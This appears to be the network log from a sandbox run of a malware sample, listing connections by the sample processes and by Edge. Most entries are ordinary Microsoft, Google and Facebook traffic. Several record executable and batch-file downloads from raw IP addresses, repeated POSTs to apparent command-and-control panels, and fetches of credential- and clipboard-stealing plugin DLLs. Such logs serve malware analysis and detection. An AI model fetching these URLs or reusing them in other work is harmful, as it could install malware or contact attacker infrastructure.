                                                                                                                https://tse1.mm.bing.net/th?id=OADD2.10239317301402_14KUDKAGB5S6I0PY4&pid=21.2&w=1080&h=1920&c=4
                                                                                                                Remote address:
                                                                                                                204.79.197.200:443
                                                                                                                Request
                                                                                                                GET /th?id=OADD2.10239317301402_14KUDKAGB5S6I0PY4&pid=21.2&w=1080&h=1920&c=4 HTTP/2.0
                                                                                                                host: tse1.mm.bing.net
                                                                                                                accept: */*
                                                                                                                accept-encoding: gzip, deflate, br
                                                                                                                user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
                                                                                                              • flag-us
                                                                                                                GET
                                                                                                                https://tse1.mm.bing.net/th?id=OADD2.10239317301657_1A2Y2HPL5GA07URZQ&pid=21.2&w=1080&h=1920&c=4
                                                                                                                Remote address:
                                                                                                                204.79.197.200:443
                                                                                                                Request
                                                                                                                GET /th?id=OADD2.10239317301657_1A2Y2HPL5GA07URZQ&pid=21.2&w=1080&h=1920&c=4 HTTP/2.0
                                                                                                                host: tse1.mm.bing.net
                                                                                                                accept: */*
                                                                                                                accept-encoding: gzip, deflate, br
                                                                                                                user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
                                                                                                              • flag-us
                                                                                                                GET
                                                                                                                https://tse1.mm.bing.net/th?id=OADD2.10239317301248_1XIEMIBBUMA1BDE5T&pid=21.2&w=1920&h=1080&c=4
                                                                                                                Remote address:
                                                                                                                204.79.197.200:443
                                                                                                                Request
                                                                                                                GET /th?id=OADD2.10239317301248_1XIEMIBBUMA1BDE5T&pid=21.2&w=1920&h=1080&c=4 HTTP/2.0
                                                                                                                host: tse1.mm.bing.net
                                                                                                                accept: */*
                                                                                                                accept-encoding: gzip, deflate, br
                                                                                                                user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
                                                                                                              • flag-us
                                                                                                                GET
                                                                                                                https://tse1.mm.bing.net/th?id=OADD2.10239317301143_11K66B0WIWZ9F4H58&pid=21.2&w=1920&h=1080&c=4
                                                                                                                Remote address:
                                                                                                                204.79.197.200:443
                                                                                                                Request
                                                                                                                GET /th?id=OADD2.10239317301143_11K66B0WIWZ9F4H58&pid=21.2&w=1920&h=1080&c=4 HTTP/2.0
                                                                                                                host: tse1.mm.bing.net
                                                                                                                accept: */*
                                                                                                                accept-encoding: gzip, deflate, br
                                                                                                                user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
                                                                                                              • flag-us
                                                                                                                GET
                                                                                                                https://tse1.mm.bing.net/th?id=OADD2.10239317300931_116ZGE2JLLUHLMEDS&pid=21.2&w=1920&h=1080&c=4
                                                                                                                Remote address:
                                                                                                                204.79.197.200:443
                                                                                                                Request
                                                                                                                GET /th?id=OADD2.10239317300931_116ZGE2JLLUHLMEDS&pid=21.2&w=1920&h=1080&c=4 HTTP/2.0
                                                                                                                host: tse1.mm.bing.net
                                                                                                                accept: */*
                                                                                                                accept-encoding: gzip, deflate, br
                                                                                                                user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
                                                                                                              • flag-us
                                                                                                                GET
                                                                                                                https://tse1.mm.bing.net/th?id=OADD2.10239317301364_1Z8KBZ9IPN02ZTCGX&pid=21.2&w=1080&h=1920&c=4
                                                                                                                Remote address:
                                                                                                                204.79.197.200:443
                                                                                                                Request
                                                                                                                GET /th?id=OADD2.10239317301364_1Z8KBZ9IPN02ZTCGX&pid=21.2&w=1080&h=1920&c=4 HTTP/2.0
                                                                                                                host: tse1.mm.bing.net
                                                                                                                accept: */*
                                                                                                                accept-encoding: gzip, deflate, br
                                                                                                                user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
                                                                                                              • flag-us
                                                                                                                DNS
                                                                                                                196.168.217.172.in-addr.arpa
                                                                                                                Remote address:
                                                                                                                8.8.8.8:53
                                                                                                                Request
                                                                                                                196.168.217.172.in-addr.arpa
                                                                                                                IN PTR
                                                                                                                Response
                                                                                                                196.168.217.172.in-addr.arpa
                                                                                                                IN PTR
                                                                                                                ams16s32-in-f41e100net
                                                                                                              • flag-us
                                                                                                                DNS
                                                                                                                196.168.217.172.in-addr.arpa
                                                                                                                Remote address:
                                                                                                                8.8.8.8:53
                                                                                                                Request
                                                                                                                196.168.217.172.in-addr.arpa
                                                                                                                IN PTR
                                                                                                              • 77.91.68.29:80
                                                                                                                http://77.91.68.29/fks/
                                                                                                                http
                                                                                                                165.9kB
                                                                                                                3.9MB
                                                                                                                2746
                                                                                                                2818

                                                                                                                HTTP Request

                                                                                                                POST http://77.91.68.29/fks/

                                                                                                                HTTP Response

                                                                                                                404

                                                                                                                HTTP Request

                                                                                                                POST http://77.91.68.29/fks/

                                                                                                                HTTP Response

                                                                                                                404

                                                                                                                HTTP Request

                                                                                                                POST http://77.91.68.29/fks/

                                                                                                                HTTP Response

                                                                                                                404

                                                                                                                HTTP Request

                                                                                                                POST http://77.91.68.29/fks/

                                                                                                                HTTP Response

                                                                                                                404

                                                                                                                HTTP Request

                                                                                                                POST http://77.91.68.29/fks/

                                                                                                                HTTP Response

                                                                                                                404

                                                                                                                HTTP Request

                                                                                                                POST http://77.91.68.29/fks/

                                                                                                                HTTP Response

                                                                                                                404

                                                                                                                HTTP Request

                                                                                                                POST http://77.91.68.29/fks/

                                                                                                                HTTP Response

                                                                                                                404

                                                                                                                HTTP Request

                                                                                                                POST http://77.91.68.29/fks/

                                                                                                                HTTP Response

                                                                                                                404
                                                                                                              • 77.91.68.52:80
                                                                                                                http://77.91.68.52/fuza/3.bat
                                                                                                                http
                                                                                                                435 B
                                                                                                                592 B
                                                                                                                6
                                                                                                                5

                                                                                                                HTTP Request

                                                                                                                GET http://77.91.68.52/fuza/3.bat

                                                                                                                HTTP Response

                                                                                                                200
                                                                                                              • 77.91.68.29:80
                                                                                                                http://77.91.68.29/fks/
                                                                                                                http
                                                                                                                83.0kB
                                                                                                                1.6MB
                                                                                                                1203
                                                                                                                1207

                                                                                                                HTTP Request

                                                                                                                POST http://77.91.68.29/fks/

                                                                                                                HTTP Response

                                                                                                                404

                                                                                                                HTTP Request

                                                                                                                POST http://77.91.68.29/fks/

                                                                                                                HTTP Response

                                                                                                                404

                                                                                                                HTTP Request

                                                                                                                POST http://77.91.68.29/fks/

                                                                                                                HTTP Response

                                                                                                                404

                                                                                                                HTTP Request

                                                                                                                POST http://77.91.68.29/fks/

                                                                                                                HTTP Response

                                                                                                                404

                                                                                                                HTTP Request

                                                                                                                POST http://77.91.68.29/fks/

                                                                                                                HTTP Response

                                                                                                                404

                                                                                                                HTTP Request

                                                                                                                POST http://77.91.68.29/fks/

                                                                                                                HTTP Response

                                                                                                                404

                                                                                                                HTTP Request

                                                                                                                POST http://77.91.68.29/fks/

                                                                                                                HTTP Response

                                                                                                                404

                                                                                                                HTTP Request

                                                                                                                POST http://77.91.68.29/fks/

                                                                                                                HTTP Response

                                                                                                                404

                                                                                                                HTTP Request

                                                                                                                POST http://77.91.68.29/fks/

                                                                                                                HTTP Response

                                                                                                                404

                                                                                                                HTTP Request

                                                                                                                POST http://77.91.68.29/fks/

                                                                                                                HTTP Response

                                                                                                                404

                                                                                                                HTTP Request

                                                                                                                POST http://77.91.68.29/fks/

                                                                                                                HTTP Response

                                                                                                                404

                                                                                                                HTTP Request

                                                                                                                POST http://77.91.68.29/fks/

                                                                                                                HTTP Response

                                                                                                                404

                                                                                                                HTTP Request

                                                                                                                POST http://77.91.68.29/fks/

                                                                                                                HTTP Response

                                                                                                                404

                                                                                                                HTTP Request

                                                                                                                POST http://77.91.68.29/fks/

                                                                                                                HTTP Response

                                                                                                                404

                                                                                                                HTTP Request

                                                                                                                POST http://77.91.68.29/fks/

                                                                                                                HTTP Response

                                                                                                                404

                                                                                                                HTTP Request

                                                                                                                POST http://77.91.68.29/fks/

                                                                                                                HTTP Response

                                                                                                                404

                                                                                                                HTTP Request

                                                                                                                POST http://77.91.68.29/fks/

                                                                                                                HTTP Response

                                                                                                                404

                                                                                                                HTTP Request

                                                                                                                POST http://77.91.68.29/fks/

                                                                                                                HTTP Response

                                                                                                                404

                                                                                                                HTTP Request

                                                                                                                POST http://77.91.68.29/fks/

                                                                                                                HTTP Response

                                                                                                                404

                                                                                                                HTTP Request

                                                                                                                POST http://77.91.68.29/fks/

                                                                                                                HTTP Response

                                                                                                                404
                                                                                                              • 5.42.92.211:80
                                                                                                                http://5.42.92.211/loghub/master
                                                                                                                http
                                                                                                                AppLaunch.exe
                                                                                                                748 B
                                                                                                                436 B
                                                                                                                6
                                                                                                                4

                                                                                                                HTTP Request

                                                                                                                POST http://5.42.92.211/loghub/master

                                                                                                                HTTP Response

                                                                                                                200
                                                                                                              • 5.42.65.80:80
                                                                                                                http://5.42.65.80/rinkas.exe
                                                                                                                http
                                                                                                                4.0kB
                                                                                                                209.5kB
                                                                                                                84
                                                                                                                161

                                                                                                                HTTP Request

                                                                                                                GET http://5.42.65.80/rinkas.exe

                                                                                                                HTTP Response

                                                                                                                200
                                                                                                              • 185.216.70.222:80
                                                                                                                http://185.216.70.222/trafico.exe
                                                                                                                http
                                                                                                                8.1kB
                                                                                                                467.0kB
                                                                                                                173
                                                                                                                338

                                                                                                                HTTP Request

                                                                                                                GET http://185.216.70.222/trafico.exe

                                                                                                                HTTP Response

                                                                                                                200
                                                                                                              • 171.22.28.213:80
                                                                                                                http://171.22.28.213/1.exe
                                                                                                                http
                                                                                                                19.1kB
                                                                                                                1.1MB
                                                                                                                411
                                                                                                                801

                                                                                                                HTTP Request

                                                                                                                GET http://171.22.28.213/1.exe

                                                                                                                HTTP Response

                                                                                                                200
                                                                                                              • 142.250.179.141:443
                                                                                                                accounts.google.com
                                                                                                                tls, http2
                                                                                                                msedge.exe
                                                                                                                999 B
                                                                                                                5.8kB
                                                                                                                9
                                                                                                                8
                                                                                                              • 142.250.179.141:443
                                                                                                                https://accounts.google.com/InteractiveLogin?continue=https://accounts.google.com/&followup=https://accounts.google.com/&passive=1209600&ifkv=AYZoVhcK3fL3PuBZwnRtldzJbqu6VIgUGaY9vhD_m5KY7Y6LEnl2nO7S-BM-P9Rx8fVz0FzqcT4l8Q
                                                                                                                tls, http2
                                                                                                                msedge.exe
                                                                                                                2.8kB
                                                                                                                10.4kB
                                                                                                                22
                                                                                                                26

                                                                                                                HTTP Request

                                                                                                                GET https://accounts.google.com/

                                                                                                                HTTP Request

                                                                                                                GET https://accounts.google.com/ServiceLogin?passive=1209600&continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F

                                                                                                                HTTP Request

                                                                                                                GET https://accounts.google.com/InteractiveLogin?continue=https://accounts.google.com/&followup=https://accounts.google.com/&passive=1209600&ifkv=AYZoVhcK3fL3PuBZwnRtldzJbqu6VIgUGaY9vhD_m5KY7Y6LEnl2nO7S-BM-P9Rx8fVz0FzqcT4l8Q
                                                                                                              • 157.240.201.35:443
                                                                                                                www.facebook.com
                                                                                                                tls
                                                                                                                msedge.exe
                                                                                                                29.0kB
                                                                                                                327.1kB
                                                                                                                179
                                                                                                                268
                                                                                                              • 157.240.201.35:443
                                                                                                                www.facebook.com
                                                                                                                tls
                                                                                                                msedge.exe
                                                                                                                989 B
                                                                                                                3.0kB
                                                                                                                9
                                                                                                                7
                                                                                                              • 157.240.221.16:443
                                                                                                                static.xx.fbcdn.net
                                                                                                                tls
                                                                                                                msedge.exe
                                                                                                                989 B
                                                                                                                3.0kB
                                                                                                                9
                                                                                                                7
                                                                                                              • 157.240.221.16:443
                                                                                                                static.xx.fbcdn.net
                                                                                                                tls
                                                                                                                msedge.exe
                                                                                                                989 B
                                                                                                                3.0kB
                                                                                                                9
                                                                                                                7
                                                                                                              • 157.240.221.16:443
                                                                                                                static.xx.fbcdn.net
                                                                                                                tls
                                                                                                                msedge.exe
                                                                                                                989 B
                                                                                                                3.0kB
                                                                                                                9
                                                                                                                7
                                                                                                              • 157.240.221.16:443
                                                                                                                static.xx.fbcdn.net
                                                                                                                tls
                                                                                                                msedge.exe
                                                                                                                989 B
                                                                                                                3.0kB
                                                                                                                9
                                                                                                                7
                                                                                                              • 157.240.221.16:443
                                                                                                                static.xx.fbcdn.net
                                                                                                                tls
                                                                                                                msedge.exe
                                                                                                                989 B
                                                                                                                3.0kB
                                                                                                                9
                                                                                                                7
                                                                                                              • 157.240.221.16:443
                                                                                                                static.xx.fbcdn.net
                                                                                                                tls
                                                                                                                msedge.exe
                                                                                                                19.2kB
                                                                                                                423.6kB
                                                                                                                292
                                                                                                                404
                                                                                                              • 157.240.221.35:443
                                                                                                                facebook.com
                                                                                                                tls
                                                                                                                msedge.exe
                                                                                                                1.7kB
                                                                                                                4.0kB
                                                                                                                14
                                                                                                                15
                                                                                                              • 157.240.221.35:443
                                                                                                                fbcdn.net
                                                                                                                tls
                                                                                                                msedge.exe
                                                                                                                1.9kB
                                                                                                                5.1kB
                                                                                                                16
                                                                                                                19
                                                                                                              • 77.91.124.1:80
                                                                                                                http://77.91.124.1/theme/index.php
                                                                                                                http
                                                                                                                explothe.exe
                                                                                                                512 B
                                                                                                                365 B
                                                                                                                6
                                                                                                                5

                                                                                                                HTTP Request

                                                                                                                POST http://77.91.124.1/theme/index.php

                                                                                                                HTTP Response

                                                                                                                200
                                                                                                              • 5.42.65.80:80
                                                                                                                http://5.42.65.80/8bmeVwqx/index.php
                                                                                                                http
                                                                                                                oneetx.exe
                                                                                                                468 B
                                                                                                                367 B
                                                                                                                5
                                                                                                                4

                                                                                                                HTTP Request

                                                                                                                POST http://5.42.65.80/8bmeVwqx/index.php

                                                                                                                HTTP Response

                                                                                                                200
                                                                                                              • 104.85.2.139:443
                                                                                                                https://learn.microsoft.com/media/logos/logo_net.svg
                                                                                                                tls, http2
                                                                                                                msedge.exe
                                                                                                                29.4kB
                                                                                                                1.3MB
                                                                                                                539
                                                                                                                990

                                                                                                                HTTP Request

                                                                                                                GET https://learn.microsoft.com/dotnet/framework/install/application-not-started?version=(null)&processName=372F.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0

                                                                                                                HTTP Response

                                                                                                                301

                                                                                                                HTTP Request

                                                                                                                GET https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=372F.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0

                                                                                                                HTTP Request

                                                                                                                GET https://learn.microsoft.com/dotnet/framework/install/application-not-started?version=(null)&processName=372F.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0

                                                                                                                HTTP Response

                                                                                                                301

                                                                                                                HTTP Response

                                                                                                                200

                                                                                                                HTTP Request

                                                                                                                GET https://learn.microsoft.com/_themes/docs.theme/master/en-us/_themes/styles/fe274a7f.site-ltr.css

                                                                                                                HTTP Request

                                                                                                                GET https://learn.microsoft.com/static/third-party/adobe-target/at-js/2.9.0/at.js

                                                                                                                HTTP Request

                                                                                                                GET https://learn.microsoft.com/_themes/docs.theme/master/en-us/_themes/global/67a45209.deprecation.js

                                                                                                                HTTP Request

                                                                                                                GET https://learn.microsoft.com/_themes/docs.theme/master/en-us/_themes/scripts/f5d007b1.index-docs.js

                                                                                                                HTTP Response

                                                                                                                200

                                                                                                                HTTP Response

                                                                                                                200

                                                                                                                HTTP Response

                                                                                                                200

                                                                                                                HTTP Response

                                                                                                                200

                                                                                                                HTTP Request

                                                                                                                GET https://learn.microsoft.com/static/third-party/MathJax/3.2.2/tex-mml-chtml.js

                                                                                                                HTTP Response

                                                                                                                200

                                                                                                                HTTP Request

                                                                                                                GET https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/app-could-not-be-started.png

                                                                                                                HTTP Response

                                                                                                                200

                                                                                                                HTTP Request

                                                                                                                GET https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-recommended-changes.png

                                                                                                                HTTP Response

                                                                                                                200

                                                                                                                HTTP Request

                                                                                                                GET https://learn.microsoft.com/en-us/content-nav/MSDocsHeader-DotNet.json?

                                                                                                                HTTP Request

                                                                                                                GET https://learn.microsoft.com/en-us/dotnet/framework/toc.json

                                                                                                                HTTP Request

                                                                                                                GET https://learn.microsoft.com/en-us/dotnet/breadcrumb/toc.json

                                                                                                                HTTP Request

                                                                                                                GET https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-changes-complete.png

                                                                                                                HTTP Request

                                                                                                                GET https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-no-resolution.png

                                                                                                                HTTP Request

                                                                                                                GET https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/install-3-5.png

                                                                                                                HTTP Request

                                                                                                                GET https://learn.microsoft.com/media/logos/logo_net.svg

                                                                                                                HTTP Response

                                                                                                                200

                                                                                                                HTTP Response

                                                                                                                200

                                                                                                                HTTP Response

                                                                                                                200

                                                                                                                HTTP Response

                                                                                                                200

                                                                                                                HTTP Response

                                                                                                                200

                                                                                                                HTTP Response

                                                                                                                200

                                                                                                                HTTP Response

                                                                                                                301

                                                                                                                HTTP Request

                                                                                                                POST https://learn.microsoft.com/api/recommendations/c89966aa-b155-c98a-2391-47e01d468236/batch

                                                                                                                HTTP Request

                                                                                                                GET https://learn.microsoft.com/en-us/media/event-banners/banner-ignite-2023-flatcolor.png?branch=live

                                                                                                                HTTP Response

                                                                                                                200

                                                                                                                HTTP Request

                                                                                                                GET https://learn.microsoft.com/_themes/docs.theme/master/en-us/_themes/styles/docons.28d69bd4.woff2

                                                                                                                HTTP Request

                                                                                                                GET https://learn.microsoft.com/en-us/media/logos/logo_net.svg

                                                                                                                HTTP Response

                                                                                                                200

                                                                                                                HTTP Response

                                                                                                                200

                                                                                                                HTTP Response

                                                                                                                200

                                                                                                                HTTP Request

                                                                                                                GET https://learn.microsoft.com/favicon.ico

                                                                                                                HTTP Response

                                                                                                                200

                                                                                                                HTTP Request

                                                                                                                POST https://learn.microsoft.com/api/recommendations/c89966aa-b155-c98a-2391-47e01d468236/batch

                                                                                                                HTTP Response

                                                                                                                200

                                                                                                                HTTP Request

                                                                                                                GET https://learn.microsoft.com/media/logos/logo_net.svg

                                                                                                                HTTP Response

                                                                                                                301
                                                                                                              • 171.22.28.202:16706
                                                                                                                5009.exe
                                                                                                                617.5kB
                                                                                                                20.4kB
                                                                                                                457
                                                                                                                289
                                                                                                              • 185.196.9.65:80
                                                                                                                http
                                                                                                                5308.exe
                                                                                                                1.5MB
                                                                                                                20.9kB
                                                                                                                1094
                                                                                                                336
                                                                                                              • 13.107.246.67:443
                                                                                                                https://wcpstatic.microsoft.com/mscc/lib/v2/wcp-consent.js
                                                                                                                tls, http2
                                                                                                                msedge.exe
                                                                                                                3.7kB
                                                                                                                91.3kB
                                                                                                                54
                                                                                                                78

                                                                                                                HTTP Request

                                                                                                                GET https://wcpstatic.microsoft.com/mscc/lib/v2/wcp-consent.js

                                                                                                                HTTP Response

                                                                                                                200
                                                                                                              • 85.209.176.171:80
                                                                                                                http://85.209.176.171/
                                                                                                                http
                                                                                                                475D.exe
                                                                                                                6.1MB
                                                                                                                92.4kB
                                                                                                                4417
                                                                                                                1616

                                                                                                                HTTP Request

                                                                                                                POST http://85.209.176.171/

                                                                                                                HTTP Response

                                                                                                                200

                                                                                                                HTTP Request

                                                                                                                POST http://85.209.176.171/

                                                                                                                HTTP Response

                                                                                                                200

                                                                                                                HTTP Request

                                                                                                                POST http://85.209.176.171/

                                                                                                                HTTP Response

                                                                                                                200

                                                                                                                HTTP Response

                                                                                                                100
                                                                                                              • 13.107.246.67:443
                                                                                                                js.monitor.azure.com
                                                                                                                tls, http2
                                                                                                                msedge.exe
                                                                                                                3.6kB
                                                                                                                6.9kB
                                                                                                                11
                                                                                                                13
                                                                                                              • 13.107.246.67:443
                                                                                                                https://js.monitor.azure.com/scripts/c/ms.jsll-3.min.js
                                                                                                                tls, http2
                                                                                                                msedge.exe
                                                                                                                5.8kB
                                                                                                                72.4kB
                                                                                                                48
                                                                                                                64

                                                                                                                HTTP Request

                                                                                                                GET https://js.monitor.azure.com/scripts/c/ms.jsll-3.min.js

                                                                                                                HTTP Response

                                                                                                                200
                                                                                                              • 77.91.124.55:19071
                                                                                                                2QN962xW.exe
                                                                                                                260 B
                                                                                                                5
                                                                                                              • 185.216.70.238:37515
                                                                                                                vbc.exe
                                                                                                                2.2MB
                                                                                                                39.5kB
                                                                                                                1644
                                                                                                                824
                                                                                                              • 52.210.204.82:443
                                                                                                                mscom.demdex.net
                                                                                                                tls
                                                                                                                msedge.exe
                                                                                                                1.0kB
                                                                                                                4.9kB
                                                                                                                8
                                                                                                                9
                                                                                                              • 77.91.124.55:19071
                                                                                                                AppLaunch.exe
                                                                                                                260 B
                                                                                                                5
                                                                                                              • 104.26.12.31:443
                                                                                                                https://api.ip.sb/ip
                                                                                                                tls, http
                                                                                                                5308.exe
                                                                                                                710 B
                                                                                                                3.8kB
                                                                                                                8
                                                                                                                7

                                                                                                                HTTP Request

                                                                                                                GET https://api.ip.sb/ip

                                                                                                                HTTP Response

                                                                                                                200
                                                                                                              • 104.208.16.89:443
                                                                                                                https://browser.events.data.microsoft.com/OneCollector/1.0/?cors=true&content-type=application/x-json-stream&ext.intweb.msfpc=GUID%3Dec0a3a472a5447f09b6cc4f266400c4c%26HASH%3Dec0a%26LV%3D202310%26V%3D4%26LU%3D1697143717178&w=0
                                                                                                                tls, http2
                                                                                                                msedge.exe
                                                                                                                2.1kB
                                                                                                                7.4kB
                                                                                                                14
                                                                                                                13

                                                                                                                HTTP Request

                                                                                                                OPTIONS https://browser.events.data.microsoft.com/OneCollector/1.0/?cors=true&content-type=application/x-json-stream&w=0

                                                                                                                HTTP Response

                                                                                                                200

                                                                                                                HTTP Request

                                                                                                                OPTIONS https://browser.events.data.microsoft.com/OneCollector/1.0/?cors=true&content-type=application/x-json-stream&ext.intweb.msfpc=GUID%3Dec0a3a472a5447f09b6cc4f266400c4c%26HASH%3Dec0a%26LV%3D202310%26V%3D4%26LU%3D1697143717178&w=0

                                                                                                                HTTP Response

                                                                                                                200
                                                                                                              • 104.208.16.89:443
                                                                                                                https://browser.events.data.microsoft.com/OneCollector/1.0/?cors=true&content-type=application/x-json-stream&ext.intweb.msfpc=GUID%3Dec0a3a472a5447f09b6cc4f266400c4c%26HASH%3Dec0a%26LV%3D202310%26V%3D4%26LU%3D1697143717178&w=0
                                                                                                                tls, http2
                                                                                                                msedge.exe
                                                                                                                26.6kB
                                                                                                                10.5kB
                                                                                                                48
                                                                                                                43

                                                                                                                HTTP Request

                                                                                                                POST https://browser.events.data.microsoft.com/OneCollector/1.0/?cors=true&content-type=application/x-json-stream&w=0

                                                                                                                HTTP Response

                                                                                                                200

                                                                                                                HTTP Request

                                                                                                                POST https://browser.events.data.microsoft.com/OneCollector/1.0/?cors=true&content-type=application/x-json-stream&w=0

                                                                                                                HTTP Response

                                                                                                                200

                                                                                                                HTTP Request

                                                                                                                POST https://browser.events.data.microsoft.com/OneCollector/1.0/?cors=true&content-type=application/x-json-stream&ext.intweb.msfpc=GUID%3Dec0a3a472a5447f09b6cc4f266400c4c%26HASH%3Dec0a%26LV%3D202310%26V%3D4%26LU%3D1697143717178&w=0

                                                                                                                HTTP Response

                                                                                                                200

                                                                                                                HTTP Request

                                                                                                                POST https://browser.events.data.microsoft.com/OneCollector/1.0/?cors=true&content-type=application/x-json-stream&ext.intweb.msfpc=GUID%3Dec0a3a472a5447f09b6cc4f266400c4c%26HASH%3Dec0a%26LV%3D202310%26V%3D4%26LU%3D1697143717178&w=0

                                                                                                                HTTP Response

                                                                                                                200

                                                                                                                HTTP Request

                                                                                                                POST https://browser.events.data.microsoft.com/OneCollector/1.0/?cors=true&content-type=application/x-json-stream&ext.intweb.msfpc=GUID%3Dec0a3a472a5447f09b6cc4f266400c4c%26HASH%3Dec0a%26LV%3D202310%26V%3D4%26LU%3D1697143717178&w=0

                                                                                                                HTTP Response

                                                                                                                200

                                                                                                                HTTP Request

                                                                                                                POST https://browser.events.data.microsoft.com/OneCollector/1.0/?cors=true&content-type=application/x-json-stream&ext.intweb.msfpc=GUID%3Dec0a3a472a5447f09b6cc4f266400c4c%26HASH%3Dec0a%26LV%3D202310%26V%3D4%26LU%3D1697143717178&w=0

                                                                                                                HTTP Response

                                                                                                                200

                                                                                                                HTTP Request

                                                                                                                POST https://browser.events.data.microsoft.com/OneCollector/1.0/?cors=true&content-type=application/x-json-stream&ext.intweb.msfpc=GUID%3Dec0a3a472a5447f09b6cc4f266400c4c%26HASH%3Dec0a%26LV%3D202310%26V%3D4%26LU%3D1697143717178&w=0

                                                                                                                HTTP Response

                                                                                                                200
                                                                                                              • 104.26.12.31:443
                                                                                                                https://api.ip.sb/geoip
                                                                                                                tls, http
                                                                                                                475D.exe
                                                                                                                667 B
                                                                                                                4.1kB
                                                                                                                7
                                                                                                                7

                                                                                                                HTTP Request

                                                                                                                GET https://api.ip.sb/geoip

                                                                                                                HTTP Response

                                                                                                                200
                                                                                                              • 77.91.124.1:80
                                                                                                                http://77.91.124.1/theme/Plugins/clip64.dll
                                                                                                                http
                                                                                                                explothe.exe
                                                                                                                3.8kB
                                                                                                                94.8kB
                                                                                                                75
                                                                                                                74

                                                                                                                HTTP Request

                                                                                                                GET http://77.91.124.1/theme/Plugins/cred64.dll

                                                                                                                HTTP Response

                                                                                                                404

                                                                                                                HTTP Request

                                                                                                                GET http://77.91.124.1/theme/Plugins/clip64.dll

                                                                                                                HTTP Response

                                                                                                                200
                                                                                                              • 142.251.36.14:443
                                                                                                                https://play.google.com/log?format=json&hasfast=true&authuser=0
                                                                                                                tls, http2
                                                                                                                msedge.exe
                                                                                                                1.7kB
                                                                                                                8.5kB
                                                                                                                14
                                                                                                                15

                                                                                                                HTTP Request

                                                                                                                OPTIONS https://play.google.com/log?format=json&hasfast=true&authuser=0
                                                                                                              • 89.23.98.197:44597
                                                                                                                5A1E.exe
                                                                                                                2.5MB
                                                                                                                40.1kB
                                                                                                                1810
                                                                                                                841
                                                                                                              • 204.79.197.200:443
                                                                                                                tse1.mm.bing.net
                                                                                                                tls, http2
                                                                                                                1.1kB
                                                                                                                8.2kB
                                                                                                                14
                                                                                                                13
                                                                                                              • 204.79.197.200:443
                                                                                                                tse1.mm.bing.net
                                                                                                                tls, http2
                                                                                                                1.2kB
                                                                                                                8.3kB
                                                                                                                15
                                                                                                                14
                                                                                                              • 204.79.197.200:443
                                                                                                                tse1.mm.bing.net
                                                                                                                tls, http2
                                                                                                                1.2kB
                                                                                                                8.3kB
                                                                                                                15
                                                                                                                14
                                                                                                              • 204.79.197.200:443
                                                                                                                https://tse1.mm.bing.net/th?id=OADD2.10239317301364_1Z8KBZ9IPN02ZTCGX&pid=21.2&w=1080&h=1920&c=4
                                                                                                                tls, http2
                                                                                                                108.0kB
                                                                                                                2.8MB
                                                                                                                2299
                                                                                                                2058

                                                                                                                HTTP Request

                                                                                                                GET https://tse1.mm.bing.net/th?id=OADD2.10239317301145_1Y8CXK45BT2OHNQQQ&pid=21.2&w=1920&h=1080&c=4

                                                                                                                HTTP Request

                                                                                                                GET https://tse1.mm.bing.net/th?id=OADD2.10239317301554_133DWC45UAH2W18HX&pid=21.2&w=1080&h=1920&c=4

                                                                                                                HTTP Request

                                                                                                                GET https://tse1.mm.bing.net/th?id=OADD2.10239317301168_16G64C18QUW861YM2&pid=21.2&w=1920&h=1080&c=4

                                                                                                                HTTP Request

                                                                                                                GET https://tse1.mm.bing.net/th?id=OADD2.10239317301577_1B5OIQ9XH8JLMH3HW&pid=21.2&w=1080&h=1920&c=4

                                                                                                                HTTP Request

                                                                                                                GET https://tse1.mm.bing.net/th?id=OADD2.10239317300969_156V9EGCLLGG8U764&pid=21.2&w=1920&h=1080&c=4

                                                                                                                HTTP Response

                                                                                                                200

                                                                                                                HTTP Response

                                                                                                                200

                                                                                                                HTTP Response

                                                                                                                200

                                                                                                                HTTP Response

                                                                                                                200

                                                                                                                HTTP Response

                                                                                                                200

                                                                                                                HTTP Request

                                                                                                                GET https://tse1.mm.bing.net/th?id=OADD2.10239317301402_14KUDKAGB5S6I0PY4&pid=21.2&w=1080&h=1920&c=4

                                                                                                                HTTP Request

                                                                                                                GET https://tse1.mm.bing.net/th?id=OADD2.10239317301657_1A2Y2HPL5GA07URZQ&pid=21.2&w=1080&h=1920&c=4

                                                                                                                HTTP Request

                                                                                                                GET https://tse1.mm.bing.net/th?id=OADD2.10239317301248_1XIEMIBBUMA1BDE5T&pid=21.2&w=1920&h=1080&c=4

                                                                                                                HTTP Request

                                                                                                                GET https://tse1.mm.bing.net/th?id=OADD2.10239317301143_11K66B0WIWZ9F4H58&pid=21.2&w=1920&h=1080&c=4

                                                                                                                HTTP Request

                                                                                                                GET https://tse1.mm.bing.net/th?id=OADD2.10239317300931_116ZGE2JLLUHLMEDS&pid=21.2&w=1920&h=1080&c=4

                                                                                                                HTTP Request

                                                                                                                GET https://tse1.mm.bing.net/th?id=OADD2.10239317301364_1Z8KBZ9IPN02ZTCGX&pid=21.2&w=1080&h=1920&c=4
                                                                                                              • 77.91.124.55:19071
                                                                                                                2QN962xW.exe
                                                                                                                208 B
